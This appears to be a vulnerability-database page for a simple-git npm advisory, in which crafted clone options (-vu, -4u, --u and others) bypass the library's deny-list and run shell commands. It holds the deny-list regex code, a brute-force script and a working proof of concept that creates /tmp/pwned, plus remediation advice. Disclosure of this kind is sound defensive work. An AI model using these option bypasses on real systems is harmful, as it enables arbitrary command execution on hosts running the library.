Severity by source
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/steveukx/git-js).
CVSS VectorVendor: https://github.com/steveukx/git-js
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
6Blast Radius
ecosystem impact- 1 npm packages depend on simple-git (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 3.32.0.
DescriptionCVE.org
Summary
simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is *likely* to affect all versions prior to and including 3.28.0.
Detail
This vulnerability was introduced by an incorrect patch for CVE-2022-25860.
It was reproduced in the following environment:
WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0
The issue was not reproduced on Windows 11.
The -u option, like --upload-pack, allows a command to be executed.
Currently, the -u and --upload-pack options are blocked in the file simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts.
function preventUploadPack(arg: string, method: string) {
if (/^\s*--(upload|receive)-pack/.test(arg)) {
throw new GitPluginError(
undefined,
'unsafe',
`Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`
);
}
if (method === 'clone' && /^\s*-u\b/.test(arg)) {
throw new GitPluginError(
undefined,
'unsafe',
`Use of clone with option -u is not permitted without enabling allowUnsafePack`
);
}
if (method === 'push' && /^\s*--exec\b/.test(arg)) {
throw new GitPluginError(
undefined,
'unsafe',
`Use of push with option --exec is not permitted without enabling allowUnsafePack`
);
}
}However, the problem is that command option parsing is quite flexible.
By brute forcing, I found various options that bypass the -u check.
[
'--u', '--u',
'-4u', '-6u',
'-lu', '-nu',
'-qu', '-su',
'-vu'
]All of the above are three-character options that allow command execution. They enable execution even when allowUnsafePack is explicitly set to false.
The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the -u option, there is also the --upload-pack option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.
Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.
Just in case, I’ll share the brute-force code I used to find options that enable command execution.
const fs = require('fs');
const simpleGit = require('simple-git');
const TMP_DIR = './pwned/';
const ITER = 256;
function cleanTmpDir() {
if (fs.existsSync(TMP_DIR)) {
fs.rmSync(TMP_DIR, { recursive: true, force: true });
}
fs.mkdirSync(TMP_DIR, { recursive: true });
}
function getPwnedFiles() {
const found = [];
for (let i = 0; i < ITER; i++) {
const fname1 = `${TMP_DIR}1_${i}`;
const fname2 = `${TMP_DIR}2_${i}`;
const fname3 = `${TMP_DIR}3_${i}`;
if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');
if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');
if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));
}
return found;
}
async function runTest(runIdx) {
const git = simpleGit();
// 1. `${~}-u` Pattern
for (let i = 0; i < ITER; i++) {
try {
await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]);
} catch {}
}
// 2. `-${~}u` Pattern
for (let i = 0; i < ITER; i++) {
try {
await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]);
} catch {}
}
// 3. `-u${~}` Pattern
for (let i = 0; i < ITER; i++) {
try {
await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]);
} catch {}
}
}
async function main() {
cleanTmpDir();
await runTest();
const found = getPwnedFiles();
console.log(found);
}
main();PoC
The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.
WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.01.
Create any git repository inside the testrepo1 folder. A very simple repository with a single commit and a single file is fine.
2.
Run the following:
const { simpleGit } = require('simple-git');
async function main() {
const git = await simpleGit({ unsafe: { allowUnsafePack: false } });
await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]);
}
main();This PoC explicitly configures allowUnsafePack to false. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.
3.
Check /tmp to confirm that pwned has been created. If it failed, try replacing -vu with a different option from the list.
Impact
This vulnerability is *likely* to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).
AnalysisAI
Command injection in simple-git npm package versions ≤3.28.0 enables arbitrary code execution via crafted Git options. Attackers who control Git command options can bypass the allowUnsafePack safety restriction using malformed variations of the -u flag (e.g., -vu, -4u, --u) to execute shell commands on Linux systems. This vulnerability stems from an incomplete fix for CVE-2022-25860, with proof-of-concept code publicly available demonstrating file creation via touch command. EPSS data not provid
Technical ContextAI
simple-git is a Node.js wrapper library for native Git commands, used extensively in CI/CD pipelines and development tooling. The vulnerability exploits Git's flexible option parsing in commands like 'git clone', where options such as -u (shorthand for --upload-pack) and --upload-pack accept arbitrary commands for remote operations. The library attempted to block dangerous options via regex patterns in block-unsafe-operations-plugin.ts, checking for --upload-pack, --receive-pack, and -u in clone operations. However, Git accepts concatenated short options (e.g., -vu combines -v and -u) and malformed variations (--u, -4u, -lu, -qu, -su) that bypass the regex patterns /^\s*-u\b/ and /^\s*--(upload|receive)-pack/. The root cause (CWE-78: OS Command Injection) is insufficient input validation - the library cannot comprehensively emulate Git's complex option parsing rules, making complete mitigation potentially infeasible without fundamental architectural changes. Affected package identifier: pkg:npm/simple-git, impacting Docker environments and Microsoft platform integrations according to available tags.
RemediationAI
No vendor-released patch identified at time of analysis, as the provided data references version 3.28.0 as affected with no confirmed fix version. Users should monitor the upstream repository at https://github.com/steveukx/git-js and the GitHub Security Advisory GHSA-jcxm-m3jx-f287 for patched releases. Until a comprehensive fix is available, implement defense-in-depth controls: strictly validate and sanitize all external input before passing to simple-git methods, particularly clone, fetch, and push operations; implement allow-listing for Git command options rather than relying on the library's built-in deny-lists; avoid exposing simple-git functionality in contexts where attackers control repository URLs or command options; consider containerization with restricted shell access to limit impact of successful command injection. Given the reporter's assessment that complete blocking may be 'virtually impossible' without faithfully emulating Git's option parsing, organizations with high-risk exposure should evaluate alternative Git wrapper libraries with more robust command construction approaches or consider using child process execution with comprehensive input validation at the application layer. Review application code for patterns where user-supplied data flows into simple-git option arrays, particularly in webhook handlers, repository management interfaces, and automated deployment scripts.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-22026
GHSA-jcxm-m3jx-f287